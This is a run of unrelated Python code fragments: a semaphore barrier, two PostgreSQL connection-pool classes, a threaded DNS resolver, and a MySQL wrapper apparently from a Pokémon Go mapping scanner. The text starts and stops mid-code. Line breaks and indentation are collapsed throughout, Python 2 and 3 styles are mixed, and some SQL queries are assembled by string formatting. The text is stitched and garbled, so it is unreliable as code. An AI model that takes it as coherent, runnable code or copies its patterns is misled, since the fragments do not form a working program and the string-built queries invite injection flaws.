finally: self._queue_lock.release() return
class Barrier: def __init__(self, n, name): self.n = n self.name = name self.count = 0 self.mutex = Semaphore(1) self.turnstile = Semaphore(0) self.turnstile2 = Semaphore(1) def wait(self, caller): print self.name + ' 1 ' + caller self.mutex.acquire() self.count = self.count + 1 if (self.count == self.n): print 'Done----- ' + self.name + ' 1' self.turnstile2.acquire() self.turnstile.release() self.mutex.release() self.turnstile.acquire() self.turnstile.release() def wait2(self, caller): print self.name + ' 2 ' + caller self.mutex.acquire() self.count = self.count - 1 if (self.count == 0): print 'Done----- ' + self.name + ' 2' self.turnstile.acquire() self.turnstile2.release() self.mutex.release() self.turnstile2.acquire() self.turnstile2.release()
class PooledPg: """Pool for classic PyGreSQL connections. After you have created the connection pool, you can use connection() to get pooled, steady PostgreSQL connections. """ version = __version__ def __init__(self, mincached=0, maxcached=0, maxconnections=0, blocking=False, maxusage=None, setsession=None, reset=None, *args, **kwargs): """Set up the PostgreSQL connection pool. mincached: initial number of connections in the pool (0 means no connections are made at startup) maxcached: maximum number of connections in the pool (0 or None means unlimited pool size) maxconnections: maximum number of connections generally allowed (0 or None means an arbitrary number of connections) blocking: determines behavior when exceeding the maximum (if this is set to true, block and wait until the number of connections decreases, otherwise an error will be reported) maxusage: maximum number of reuses of a single connection (0 or None means unlimited reuse) When this maximum usage number of the connection is reached, the connection is automatically reset (closed and reopened). setsession: optional list of SQL commands that may serve to prepare the session, e.g. ["set datestyle to ...", "set time zone ..."] reset: how connections should be reset when returned to the pool (0 or None to rollback transcations started with begin(), 1 to always issue a rollback, 2 for a complete reset) args, kwargs: the parameters that shall be used to establish the PostgreSQL connections using class PyGreSQL pg.DB() """ self._args, self._kwargs = args, kwargs self._maxusage = maxusage self._setsession = setsession self._reset = reset or 0 if mincached is None: mincached = 0 if maxcached is None: maxcached = 0 if maxconnections is None: maxconnections = 0 if maxcached: if maxcached < mincached: maxcached = mincached if maxconnections: if maxconnections < maxcached: maxconnections = maxcached # Create semaphore for number of allowed connections generally: from threading import Semaphore self._connections = Semaphore(maxconnections) self._blocking = blocking else: self._connections = None self._cache = Queue(maxcached) # the actual connection pool # Establish an initial number of database connections: idle = [self.connection() for i in range(mincached)] while idle: idle.pop().close() def steady_connection(self): """Get a steady, unpooled PostgreSQL connection.""" return SteadyPgConnection(self._maxusage, self._setsession, True, *self._args, **self._kwargs) def connection(self): """Get a steady, cached PostgreSQL connection from the pool.""" if self._connections: if not self._connections.acquire(self._blocking): raise TooManyConnections try: con = self._cache.get(0) except Empty: con = self.steady_connection() return PooledPgConnection(self, con) def cache(self, con): """Put a connection back into the pool cache.""" try: if self._reset == 2: con.reset() # reset the connection completely else: if self._reset or con._transaction: try: con.rollback() # rollback a possible transaction except Exception: pass self._cache.put(con, 0) # and then put it back into the cache except Full: con.close() if self._connections: self._connections.release() def close(self): """Close all connections in the pool.""" while 1: try: con = self._cache.get(0) try: con.close() except Exception: pass if self._connections: self._connections.release() except Empty: break def __del__(self): """Delete the pool.""" try: self.close() except Exception: pass
class DNS_Solver(Thread): class dns_item: def __init__(self, host): self._host = host self._ip = "" self._solving = True self._time = time.time() # Required Worker method def numPendingJobs(self): self._queuelock.acquire() num = 0 for dns in self._dnslist: if not dns._solving: num += 1 self._queuelock.release() return num # Required Worker method def enqueueJobs(self, job): self.addDNS(job) # Required Worker method def stopWorking(self): self.finalize() def waitEnd(self): self._exit_on_end = True self._waitsem.release() self.join() # URL_list is a list of complete URLs such as http://hst.com:80/path def __init__(self, hostlist=[]): super(DNS_Solver, self).__init__() self._dnslist = [] for dns in hostlist: self._dnslist.append(DNS_Solver.dns_item(dns)) self._waitsem = Semaphore(1) self._queuelock = Semaphore(1) self._end = False self._exit_on_end = False def run(self): self.work() def finalize(self): self._end = True self._waitsem.release() def addDNS(self, dnss): self._queuelock.acquire() for dns in dnss: self._dnslist.append(DNS_Solver.dns_item(dns)) self._queuelock.release() self._waitsem.release() def isip(self, ip): if re.search("[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+", ip): return True return False def queryDNS(self, host): # Check if the host is an IP and return it! if self.isip(host): return host self._queuelock.acquire() ret = None for dns in self._dnslist: if dns._host == host: if dns._solving: self._queuelock.release() return "" else: self._queuelock.release() dns._time = time.time() # Refresh timeout! return dns._ip self._queuelock.release() self.addDNS([host]) return "" def work(self): # Process all URLS and get their indices while not self._end: allready = True self._queuelock.acquire() # Timeout delete! for dns in list(self._dnslist): if time.time() - dns._time > 30: self._dnslist.remove(dns) for dns in self._dnslist: if dns._solving: # Query it! host = dns._host allready = False break self._queuelock.release() if not allready: try: ip = socket.gethostbyname(host) except: ip = None self._queuelock.acquire() # Lock webs queue for dns in self._dnslist: if dns._host == host: dns._ip = ip dns._solving = False break self._queuelock.release() if allready and self._exit_on_end: break if allready: self._waitsem.acquire() print("LOG: Exit thread")
class PooledPg: """Pool for classic PyGreSQL connections. After you have created the connection pool, you can use connection() to get pooled, solid PostGreSQL connections. """ def __init__(self, mincached=0, maxcached=0, maxconnections=0, blocking=0, maxusage=0, setsession=None, *args, **kwargs): """Set up the PostgreSQL connection pool. mincached: initial number of connections in the pool (0 means no connections are made at startup) maxcached: maximum number of connections in the pool (0 means unlimited pool size) maxconnections: maximum number of connections generally allowed (0 means an arbitrary number of connections) blocking: determines behavior when exceeding the maximum (0 or False means report an error; otherwise block and wait until the number of connections decreases) maxusage: maximum number of reuses of a single connection (0 or False means unlimited reuse) When this maximum usage number of the connection is reached, the connection is automatically reset (closed and reopened). setsession: optional list of SQL commands that may serve to prepare the session, e.g. ["set datestyle to ...", "set time zone ..."] args, kwargs: the parameters that shall be used to establish the PostgreSQL connections using class PyGreSQL pg.DB() """ self._args, self._kwargs = args, kwargs self._maxusage = maxusage self._setsession = setsession if maxcached: if maxcached < mincached: maxcached = mincached if maxconnections: if maxconnections < maxcached: maxconnections = maxcached # Create semaphore for number of allowed connections generally: from threading import Semaphore self._connections = Semaphore(maxconnections) self._blocking = blocking else: self._connections = None self._cache = Queue(maxcached) # the actual connection pool # Establish an initial number of database connections: [self.connection() for i in range(mincached)] def solid_connection(self): """Get a solid, unpooled PostgreSQL connection.""" return SolidPgConnection(self._maxusage, self._setsession, *self._args, **self._kwargs) def connection(self): """"Get a solid, cached PostgreSQL connection from the pool.""" if self._connections: if not self._connections.acquire(self._blocking): raise TooManyConnections try: con = self._cache.get(0) except Empty: con = self.solid_connection() return PooledPgConnection(self, con) def cache(self, con): """Put a connection back into the pool cache.""" try: self._cache.put(con, 0) except Full: con.close() if self._connections: self._connections.release() def close(self): """Close all connections in the pool.""" while 1: try: self._cache.get(0).close() if self._connections: self._connections.release() except Empty: break def __del__(self): """Delete the pool.""" self.close()
class DbWrapperBase(ABC): def_spawn = 240 def __init__(self, args, webhook_helper): self.application_args = args self.host = args.dbip self.port = args.dbport self.user = args.dbusername self.password = args.dbpassword self.database = args.dbname self.pool = None self.pool_mutex = Lock() self.connection_semaphore = Semaphore( self.application_args.db_poolsize) self.webhook_helper = webhook_helper self.dbconfig = { "database": self.database, "user": self.user, "host": self.host, "password": self.password, "port": self.port } self._init_pool() def _init_pool(self): log.info("Connecting pool to DB") self.pool_mutex.acquire() self.pool = mysql.connector.pooling.MySQLConnectionPool( pool_name="db_wrapper_pool", pool_size=self.application_args.db_poolsize, **self.dbconfig) self.pool_mutex.release() def _check_column_exists(self, table, column): query = ("SELECT count(*) " "FROM information_schema.columns " "WHERE table_name = %s " "AND column_name = %s " "AND table_schema = %s") vals = ( table, column, self.database, ) return int(self.execute(query, vals)[0][0]) def _check_create_column(self, field): if self._check_column_exists(field["table"], field["column"]) == 1: return alter_query = ("ALTER TABLE {} " "ADD COLUMN {} {}".format(field["table"], field["column"], field["ctype"])) self.execute(alter_query, commit=True) if self._check_column_exists(field["table"], field["column"]) == 1: log.info("Successfully added '{}.{}' column".format( field["table"], field["column"])) return else: log.fatal("Couldn't create required column {}.{}'".format( field["table"], field["column"])) sys.exit(1) def close(self, conn, cursor): """ A method used to close connection of mysql. :param conn: :param cursor: :return: """ cursor.close() conn.close() def execute(self, sql, args=None, commit=False): """ Execute a sql, it could be with args and with out args. The usage is similar with execute() function in module pymysql. :param sql: sql clause :param args: args need by sql clause :param commit: whether to commit :return: if commit, return None, else, return result """ self.connection_semaphore.acquire() conn = self.pool.get_connection() cursor = conn.cursor() # TODO: consider catching OperationalError # try: # cursor = conn.cursor() # except OperationalError as e: # log.error("OperationalError trying to acquire a DB cursor: %s" % str(e)) # conn.rollback() # return None try: if args: cursor.execute(sql, args) else: cursor.execute(sql) if commit is True: affected_rows = cursor.rowcount conn.commit() return affected_rows else: res = cursor.fetchall() return res except mysql.connector.Error as err: log.error("Failed executing query: %s" % str(err)) return None except Exception as e: log.error("Unspecified exception in dbWrapper: %s" % str(e)) return None finally: self.close(conn, cursor) self.connection_semaphore.release() def executemany(self, sql, args, commit=False): """ Execute with many args. Similar with executemany() function in pymysql. args should be a sequence. :param sql: sql clause :param args: args :param commit: commit or not. :return: if commit, return None, else, return result """ # get connection form connection pool instead of create one. self.connection_semaphore.acquire() conn = self.pool.get_connection() cursor = conn.cursor() try: cursor.executemany(sql, args) if commit is True: conn.commit() return None else: res = cursor.fetchall() return res except mysql.connector.Error as err: log.error("Failed executing query: %s" % str(err)) return None except Exception as e: log.error("Unspecified exception in dbWrapper: %s" % str(e)) return None finally: self.close(conn, cursor) self.connection_semaphore.release() @abstractmethod def auto_hatch_eggs(self): """ Check the entire DB for unhatched level 5 eggs and updates the mon ID if there is only one possible raidmon """ pass @abstractmethod def db_timestring_to_unix_timestamp(self, timestring): """ Converts a DB timestring to a unix timestamp (seconds since epoch) """ pass @abstractmethod def get_next_raid_hatches(self, delay_after_hatch, geofence_helper=None): """ In order to build a priority queue, we need to be able to check for the next hatches of raid eggs The result may not be sorted by priority, to be done at a higher level! :return: unsorted list of next hatches within delay_after_hatch """ pass @abstractmethod def submit_raid(self, gym, pkm, lvl, start, end, type, raid_no, capture_time, unique_hash="123", MonWithNoEgg=False): """ Insert or update raid in DB and send webhook :return: if raid has all the required values = True, else False """ pass @abstractmethod def read_raid_endtime(self, gym, raid_no, unique_hash="123"): """ Check if a raid already has an endtime and return True/False appropriately :return: if raid has endtime = True, else False """ pass @abstractmethod def get_raid_endtime(self, gym, raid_no, unique_hash="123"): """ Retrieves the time the requested raid ends - if present :return: returns (Boolean, Value) with Value being the time or None, Boolean being True/False appropriately """ pass @abstractmethod def raid_exist(self, gym, type, raid_no, unique_hash="123", mon=0): """ Checks if a raid is already present in the DB :return: returns True/False indicating if a raid is already present in the database """ pass @abstractmethod def refresh_times(self, gym, raid_no, capture_time, unique_hash="123"): """ Update last_modified/last_scanned/updated of a gym """ pass @abstractmethod def get_near_gyms(self, lat, lng, hash, raid_no, dist, unique_hash="123"): """ Retrieve gyms around a given lat, lng within the given dist :return: returns list of gyms within dist sorted by distance """ pass @abstractmethod def set_scanned_location(self, lat, lng, capture_time): """ Update scannedlocation (in RM) of a given lat/lng """ pass @abstractmethod def check_stop_quest(self, lat, lng): """ Update scannedlocation (in RM) of a given lat/lng """ pass @abstractmethod def get_gym_infos(self, id=False): """ Retrieve all the gyminfos from DB :return: returns dict containing all the gyminfos contained in the DB """ pass @abstractmethod def gyms_from_db(self, geofence_helper): """ Retrieve all the gyms valid within the area set by geofence_helper :return: numpy array with coords """ pass @abstractmethod def stops_from_db(self, geofence_helper): """ Retrieve all the pokestops valid within the area set by geofence_helper :return: numpy array with coords """ pass @abstractmethod def quests_from_db(self, GUID=False): """ Retrieve all the pokestops valid within the area set by geofence_helper :return: numpy array with coords """ pass @abstractmethod def update_insert_weather(self, cell_id, gameplay_weather, capture_time, cloud_level=0, rain_level=0, wind_level=0, snow_level=0, fog_level=0, wind_direction=0, weather_daytime=0): """ Updates the weather in a given cell_id """ pass @abstractmethod def submit_mon_iv(self, origin, timestamp, encounter_proto): """ Update/Insert a mon with IVs """ pass @abstractmethod def submit_mons_map_proto(self, origin, map_proto, mon_ids_ivs): """ Update/Insert mons from a map_proto dict """ pass @abstractmethod def submit_pokestops_map_proto(self, origin, map_proto): """ Update/Insert pokestops from a map_proto dict """ pass @abstractmethod def submit_pokestops_details_map_proto(self, map_proto): """ Update/Insert pokestop details from a GMO :param map_proto: :return: """ pass @abstractmethod def submit_gyms_map_proto(self, origin, map_proto): """ Update/Insert gyms from a map_proto dict """ pass @abstractmethod def submit_raids_map_proto(self, origin, map_proto): """ Update/Insert raids from a map_proto dict """ pass @abstractmethod def submit_weather_map_proto(self, origin, map_proto, received_timestamp): """ Update/Insert weather from a map_proto dict """ pass @abstractmethod def download_gym_images(self): pass @abstractmethod def get_to_be_encountered(self, geofence_helper, min_time_left_seconds, eligible_mon_ids): pass @abstractmethod def stop_from_db_without_quests(self, geofence_helper): pass @abstractmethod def get_raids_changed_since(self, timestamp): pass @abstractmethod def get_mon_changed_since(self, timestamp): pass @abstractmethod def get_quests_changed_since(self, timestamp): pass @abstractmethod def get_gyms_changed_since(self, timestamp): pass @abstractmethod def get_weather_changed_since(self, timestamp): pass def statistics_get_pokemon_count(self, days): pass @abstractmethod def statistics_get_gym_count(self, days): pass @abstractmethod def statistics_get_stop_quest(self, days): pass def create_hash_database_if_not_exists(self): """ In order to store 'hashes' of crops/images, we require a table to store those hashes """ log.debug("{DbWrapperBase::create_hash_database_if_not_exists} called") log.debug('Creating hash db in database') query = (' Create table if not exists trshash ( ' + ' hashid MEDIUMINT NOT NULL AUTO_INCREMENT, ' + ' hash VARCHAR(255) NOT NULL, ' + ' type VARCHAR(10) NOT NULL, ' + ' id VARCHAR(255) NOT NULL, ' + ' count INT(10) NOT NULL DEFAULT 1, ' + ' modify DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP, ' + ' PRIMARY KEY (hashid))') self.execute(query, commit=True) return True def create_quest_database_if_not_exists(self): """ In order to store 'hashes' of crops/images, we require a table to store those hashes """ log.debug( "{DbWrapperBase::create_quest_database_if_not_exists} called") log.debug('Creating hash db in database') query = (' Create table if not exists trs_quest ( ' + ' GUID varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL,' + ' quest_type tinyint(3) NOT NULL, ' + ' quest_timestamp int(11) NOT NULL,' + ' quest_stardust smallint(4) NOT NULL,' + ' quest_pokemon_id smallint(4) NOT NULL,' + ' quest_reward_type smallint(3) NOT NULL,' + ' quest_item_id smallint(3) NOT NULL,' + ' quest_item_amount tinyint(2) NOT NULL,' + ' quest_target tinyint(3) NOT NULL,' + ' quest_condition varchar(500), ' + ' PRIMARY KEY (GUID), ' + ' KEY quest_type (quest_type))') self.execute(query, commit=True) return True def check_for_hash(self, imghash, type, raid_no, distance, unique_hash="123"): log.debug("{DbWrapperBase::check_for_hash} called") log.debug("[Crop: %s (%s) ] check_for_hash: Checking for hash in db" % (str(raid_no), str(unique_hash))) query = ( "SELECT id, hash, " "BIT_COUNT( " "CONVERT((CONV(hash, 16, 10)), UNSIGNED) " "^ " "CONVERT((CONV(%s, 16, 10)), UNSIGNED)) as hamming_distance, type, count, modify " "FROM trshash " "HAVING hamming_distance < %s AND type = %s " "ORDER BY hamming_distance ASC") vals = (str(imghash), distance, str(type)) res = self.execute(query, vals) number_of_rows = len(res) log.debug( "[Crop: %s (%s) ] check_for_hash: Found hashes in database: %s" % (str(raid_no), str(unique_hash), str(number_of_rows))) if number_of_rows > 0: log.debug("[Crop: %s (%s) ] check_for_hash: returning found ID" % (str(raid_no), str(unique_hash))) for row in res: log.debug("[Crop: %s (%s) ] check_for_hash: ID = %s" % (str(raid_no), str(unique_hash), str(row[0]))) log.debug("{DbWrapperBase::check_for_hash} done") return True, row[0], row[1], row[4], row[5] else: log.debug( "[Crop: %s (%s) ] check_for_hash: No matching hash found" % (str(raid_no), str(unique_hash))) log.debug("{DbWrapperBase::check_for_hash} done") return False, None, None, None, None def get_all_hash(self, type): log.debug("{DbWrapperBase::get_all_hash} called") query = ("SELECT id, hash, type, count, modify " "FROM trshash " "HAVING type = %s") vals = (str(type), ) log.debug(query) res = self.execute(query, vals) return res def insert_hash(self, imghash, type, id, raid_no, unique_hash="123"): log.debug("{DbWrapperBase::insert_hash} called") if type == 'raid': distance = 4 else: distance = 4 double_check = self.check_for_hash(imghash, type, raid_no, distance) if double_check[0]: log.debug( "[Crop: %s (%s) ] insert_hash: Already in DB, updating counter" % (str(raid_no), str(unique_hash))) # TODO: consider INSERT... ON DUPLICATE KEY UPDATE ?? if not double_check[0]: query = ("INSERT INTO trshash (hash, type, id) " "VALUES (%s, %s, %s)") vals = (str(imghash), str(type), id) else: query = ("UPDATE trshash " "SET count=count+1, modify=NOW() " "WHERE hash=%s") vals = (str(imghash), ) self.execute(query, vals, commit=True) log.debug("{DbWrapperBase::insert_hash} done") return True def delete_hash_table(self, ids, type, mode=' not in ', field=' id '): log.debug("{DbWrapperBase::delete_hash_table} called") log.debug('Deleting old Hashes of type %s' % type) log.debug('Valid ids: %s' % ids) query = ("DELETE FROM trshash " "WHERE " + field + " " + mode + " (%s) " "AND type like %s") vals = ( str(ids), str(type), ) log.debug(query) self.execute(query, vals, commit=True) return True def clear_hash_gyms(self, mons): log.debug("{DbWrapperBase::clear_hash_gyms} called") data = [] query = ("SELECT hashid " "FROM trshash " "WHERE id LIKE '%\"mon\":\"%s\"%' AND type='raid'") mon_split = mons.split('|') for mon in mon_split: args = (int(mon), ) res = self.execute(query, args) for dbid in res: data.append(int(dbid[0])) _mon_list = ','.join(map(str, data)) log.debug('clearHashGyms: Read Raid Hashes with known Mons') if len(data) > 0: query = ('DELETE FROM trshash ' + ' WHERE hashid NOT IN (' + _mon_list + ')' + ' AND type=\'raid\'') self.execute(query, commit=True) log.info('clearHashGyms: Deleted Raidhashes with unknown mons') def getspawndef(self, spawn_id): if not spawn_id: return False log.debug("{DbWrapperBase::getspawndef} called") spawnids = ",".join(map(str, spawn_id)) spawnret = {} query = ("SELECT spawnpoint, spawndef " "FROM trs_spawn where spawnpoint in (%s)" % (spawnids)) # vals = (spawn_id,) res = self.execute(query) for row in res: spawnret[row[0]] = row[1] return spawnret def submit_spawnpoints_map_proto(self, origin, map_proto): log.debug( "{DbWrapperBase::submit_spawnpoints_map_proto} called with data received by %s" % str(origin)) cells = map_proto.get("cells", None) if cells is None: return False spawnpoint_args, spawnpoint_args_unseen = [], [] spawnids = [] query_spawnpoints = ( "INSERT INTO trs_spawn (spawnpoint, latitude, longitude, earliest_unseen, " "last_scanned, spawndef, calc_endminsec) " "VALUES (%s, %s, %s, %s, %s, %s, %s) " "ON DUPLICATE KEY UPDATE last_scanned=VALUES(last_scanned), " "earliest_unseen=LEAST(earliest_unseen, VALUES(earliest_unseen)), " "spawndef=VALUES(spawndef), calc_endminsec=VALUES(calc_endminsec)" "") query_spawnpoints_unseen = ( "INSERT INTO trs_spawn (spawnpoint, latitude, longitude, earliest_unseen, last_non_scanned, spawndef) " "VALUES (%s, %s, %s, %s, %s, %s) " "ON DUPLICATE KEY UPDATE spawndef=VALUES(spawndef), last_non_scanned=VALUES(last_non_scanned)" "") now = datetime.now().strftime("%Y-%m-%d %H:%M:%S") dt = datetime.now() for cell in cells: for wild_mon in cell["wild_pokemon"]: spawnids.append(int(str(wild_mon['spawnpoint_id']), 16)) spawndef = self.getspawndef(spawnids) for cell in cells: for wild_mon in cell["wild_pokemon"]: spawnid = int(str(wild_mon['spawnpoint_id']), 16) lat, lng, alt = S2Helper.get_position_from_cell( int(str(wild_mon['spawnpoint_id']) + '00000', 16)) despawntime = wild_mon['time_till_hidden'] minpos = self._get_min_pos_in_array() # TODO: retrieve the spawndefs by a single executemany and pass that... spawndef_ = spawndef.get(spawnid, False) if spawndef_: newspawndef = self._set_spawn_see_minutesgroup( spawndef_, minpos) else: newspawndef = self._set_spawn_see_minutesgroup( DbWrapperBase.def_spawn, minpos) last_scanned = None last_non_scanned = None if 0 <= int(despawntime) <= 90000: fulldate = dt + timedelta(milliseconds=despawntime) earliest_unseen = int(despawntime) last_scanned = now calcendtime = fulldate.strftime("%M:%S") spawnpoint_args.append( (spawnid, lat, lng, earliest_unseen, last_scanned, newspawndef, calcendtime)) else: earliest_unseen = 99999999 last_non_scanned = now calcendtime = None spawnpoint_args_unseen.append( (spawnid, lat, lng, earliest_unseen, last_non_scanned, newspawndef)) self.executemany(query_spawnpoints, spawnpoint_args, commit=True) self.executemany(query_spawnpoints_unseen, spawnpoint_args_unseen, commit=True) def submitspsightings(self, spid, encid, secs): log.debug("{DbWrapperBase::submitspsightings} called") if 0 <= int(secs) <= 90000: query = ( "INSERT INTO trs_spawnsightings (encounter_id, spawnpoint_id, tth_secs) " "VALUES (%s, %s, %s)") vals = (encid, spid, secs) else: query = ( "INSERT INTO trs_spawnsightings (encounter_id, spawnpoint_id) " "VALUES (%s, %s)") vals = (encid, spid) self.execute(query, vals, commit=True) def get_spawn_infos(self): log.debug("{DbWrapperBase::get_spawn_infos} called") query = ( "SELECT count(spawnpoint), " "ROUND ( " "(COUNT(calc_endminsec) + 1) / (COUNT(*) + 1) * 100, 2) AS percent " "FROM trs_spawn") found = self.execute(query) log.info( "Spawnpoint statistics: %s, Spawnpoints with detected endtime: %s" % (str(found[0][0]), str(found[0][1]))) return float(found[0][1]) def get_detected_spawns(self, geofence_helper): log.debug("{DbWrapperBase::get_detected_spawns} called") query = ("SELECT latitude, longitude " "FROM trs_spawn") list_of_coords = [] log.debug( "{DbWrapperBase::get_detected_spawns} executing select query") res = self.execute(query) log.debug("{DbWrapperBase::get_detected_spawns} result of query: %s" % str(res)) for (latitude, longitude) in res: list_of_coords.append([latitude, longitude]) if geofence_helper is not None: log.debug("{DbWrapperBase::get_detected_spawns} applying geofence") geofenced_coords = geofence_helper.get_geofenced_coordinates( list_of_coords) log.debug(geofenced_coords) return geofenced_coords else: log.debug( "{DbWrapperBase::get_detected_spawns} converting to numpy") to_return = np.zeros(shape=(len(list_of_coords), 2)) for i in range(len(to_return)): to_return[i][0] = list_of_coords[i][0] to_return[i][1] = list_of_coords[i][1] return to_return def get_undetected_spawns(self, geofence_helper): log.debug("{DbWrapperBase::get_undetected_spawns} called") query = ("SELECT latitude, longitude " "FROM trs_spawn " "WHERE calc_endminsec is NULL") list_of_coords = [] log.debug( "{DbWrapperBase::get_undetected_spawns} executing select query") res = self.execute(query) log.debug( "{DbWrapperBase::get_undetected_spawns} result of query: %s" % str(res)) for (latitude, longitude) in res: list_of_coords.append([latitude, longitude]) if geofence_helper is not None: log.debug( "{DbWrapperBase::get_undetected_spawns} applying geofence") geofenced_coords = geofence_helper.get_geofenced_coordinates( list_of_coords) log.debug(geofenced_coords) return geofenced_coords else: log.debug( "{DbWrapperBase::get_undetected_spawns} converting to numpy") to_return = np.zeros(shape=(len(list_of_coords), 2)) for i in range(len(to_return)): to_return[i][0] = list_of_coords[i][0] to_return[i][1] = list_of_coords[i][1] return to_return def get_detected_endtime(self, spawn_id): log.debug("{DbWrapperBase::get_detected_endtime} called") query = ("SELECT calc_endminsec " "FROM trs_spawn " "WHERE spawnpoint=%s") args = (spawn_id, ) found = self.execute(query, args) if found and len(found) > 0 and found[0][0]: return str(found[0][0]) else: return False def _gen_endtime(self, known_despawn): hrmi = known_despawn.split(':') known_despawn = datetime.now().replace(hour=0, minute=int(hrmi[0]), second=int(hrmi[1]), microsecond=0) now = datetime.now() if now.minute <= known_despawn.minute: despawn = now + timedelta( minutes=known_despawn.minute - now.minute, seconds=known_despawn.second - now.second) elif now.minute > known_despawn.minute: despawn = now + timedelta(hours=1) - timedelta( minutes=(now.minute - known_despawn.minute), seconds=now.second - known_despawn.second) else: return None return time.mktime(despawn.timetuple()) def _get_min_pos_in_array(self): min = datetime.now().strftime("%M") if 0 <= int(min) < 15: pos = 4 elif 15 <= int(min) < 30: pos = 5 elif 30 <= int(min) < 45: pos = 6 elif 45 <= int(min) < 60: pos = 7 else: pos = None self.__globaldef = pos return pos def _set_spawn_see_minutesgroup(self, spawndef, pos): # b = BitArray([int(digit) for digit in bin(spawndef)[2:]]) b = BitArray(uint=spawndef, length=8) if pos == 4: b[0] = 0 b[4] = 1 if pos == 5: b[1] = 0 b[5] = 1 if pos == 6: b[2] = 0 b[6] = 1 if pos == 7: b[3] = 0 b[7] = 1 return b.uint def check_and_create_spawn_tables(self): log.debug("{DbWrapperBase::check_and_create_spawn_tables} called") query_trs_spawn = ( 'CREATE TABLE IF NOT EXISTS `trs_spawn` (' '`spawnpoint` varchar(16) COLLATE utf8mb4_unicode_ci NOT NULL, ' '`latitude` double NOT NULL, ' '`longitude` double NOT NULL, ' '`spawndef` int(11) NOT NULL DEFAULT "240", ' '`earliest_unseen` int(6) NOT NULL, ' '`last_scanned` datetime DEFAULT NULL, ' '`first_detection` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP, ' '`last_non_scanned` datetime DEFAULT NULL, ' '`calc_endminsec` varchar(5) COLLATE utf8mb4_unicode_ci DEFAULT NULL, ' 'UNIQUE KEY `spawnpoint_2` (`spawnpoint`), ' 'KEY `spawnpoint` (`spawnpoint`) ' ') ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;' ) query_trs_spawnsightings = ( 'CREATE TABLE IF NOT EXISTS `trs_spawnsightings` (' '`id` int(11) NOT NULL AUTO_INCREMENT, ' '`encounter_id` bigint(20) UNSIGNED NOT NULL, ' '`spawnpoint_id` bigint(20) UNSIGNED NOT NULL, ' '`scan_time` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP, ' '`tth_secs` int(11) DEFAULT NULL, ' 'PRIMARY KEY (`id`), ' 'KEY `trs_spawnpointdd_spawnpoint_id` (`spawnpoint_id`) ' ') ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;' ) self.execute(query_trs_spawn, commit=True) self.execute(query_trs_spawnsightings, commit=True) def download_spawns(self): log.debug("dbWrapper::download_spawns") spawn = {} query = ("SELECT spawnpoint, latitude, longitude, calc_endminsec, " "spawndef, last_scanned " "FROM `trs_spawn`") res = self.execute(query) for (spawnid, lat, lon, endtime, spawndef, last_scanned) in res: spawn[spawnid] = { 'lat': lat, 'lon': lon, 'endtime': endtime, 'spawndef': spawndef, 'lastscan': str(last_scanned) } return str(json.dumps(spawn, indent=4, sort_keys=True)) def retrieve_next_spawns(self, geofence_helper): """ Retrieve the spawnpoints with their respective unixtimestamp that are due in the next 300 seconds :return: """ current_time_of_day = datetime.now().replace(microsecond=0) log.debug("DbWrapperBase::retrieve_next_spawns called") query = ( "SELECT latitude, longitude, spawndef, calc_endminsec FROM trs_spawn WHERE calc_endminsec IS NOT NULL and " "DATE_FORMAT(STR_TO_DATE(calc_endminsec,'%i:%s'),'%i:%s') between DATE_FORMAT(DATE_ADD(NOW(), " "INTERVAL if(spawndef=15,60,30) MINUTE),'%i:%s') and DATE_FORMAT(DATE_ADD(NOW(), " "INTERVAL if(spawndef=15,70,40) MINUTE),'%i:%s')") res = self.execute(query) next_up = [] current_time = time.time() for (latitude, longitude, spawndef, calc_endminsec) in res: if geofence_helper and not geofence_helper.is_coord_inside_include_geofence( [latitude, longitude]): continue endminsec_split = calc_endminsec.split(":") minutes = int(endminsec_split[0]) seconds = int(endminsec_split[1]) temp_date = current_time_of_day.replace(minute=minutes, second=seconds) if minutes < datetime.now().minute: temp_date = temp_date + timedelta(hours=1) if temp_date < current_time_of_day: # spawn has already happened, we should've added it in the past, let's move on # TODO: consider crosschecking against current mons... continue spawn_duration_minutes = 60 if spawndef == 15 else 30 timestamp = time.mktime( temp_date.timetuple()) - spawn_duration_minutes * 60 # check if we calculated a time in the past, if so, add an hour to it... timestamp = timestamp + 60 * 60 if timestamp < current_time else timestamp # TODO: consider the following since I am not sure if the prio Q clustering handles stuff properly yet # if timestamp >= current_time + 600: # # let's skip monspawns that are more than 10minutes in the future # continue next_up.append((timestamp, Location(latitude, longitude))) return next_up def submit_quest_proto(self, map_proto): log.debug("{DbWrapperBase::submit_quest_proto} called") fort_id = map_proto.get("fort_id", None) if fort_id is None: return False if 'challenge_quest' not in map_proto: return False quest_type = map_proto['challenge_quest']['quest'].get( "quest_type", None) if map_proto['challenge_quest']['quest'].get("quest_rewards", None): rewardtype = map_proto['challenge_quest']['quest'][ 'quest_rewards'][0].get("type", None) reward = map_proto['challenge_quest']['quest'].get( "quest_rewards", None) item = map_proto['challenge_quest']['quest']['quest_rewards'][0][ 'item'].get("item", None) itemamount = map_proto['challenge_quest']['quest'][ 'quest_rewards'][0]['item'].get("amount", None) stardust = map_proto['challenge_quest']['quest']['quest_rewards'][ 0].get("stardust", None) pokemon_id = map_proto['challenge_quest']['quest'][ 'quest_rewards'][0]['pokemon_encounter'].get( "pokemon_id", None) target = map_proto['challenge_quest']['quest']['goal'].get( "target", None) condition = map_proto['challenge_quest']['quest']['goal'].get( "condition", None) task = questtask(int(quest_type), str(condition), int(target)) query_quests = ( "INSERT into trs_quest (GUID, quest_type, quest_timestamp, quest_stardust, quest_pokemon_id, " "quest_reward_type, quest_item_id, quest_item_amount, quest_target, quest_condition, quest_reward, " "quest_task) values (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)" "ON DUPLICATE KEY UPDATE quest_type=VALUES(quest_type), quest_timestamp=VALUES(quest_timestamp), " "quest_stardust=VALUES(quest_stardust), quest_pokemon_id=VALUES(quest_pokemon_id), " "quest_reward_type=VALUES(quest_reward_type), quest_item_id=VALUES(quest_item_id), " "quest_item_amount=VALUES(quest_item_amount), quest_target=VALUES(quest_target), " "quest_condition=VALUES(quest_condition), quest_reward=VALUES(quest_reward), " "quest_task=VALUES(quest_task)") vals = (fort_id, quest_type, time.time(), stardust, pokemon_id, rewardtype, item, itemamount, target, 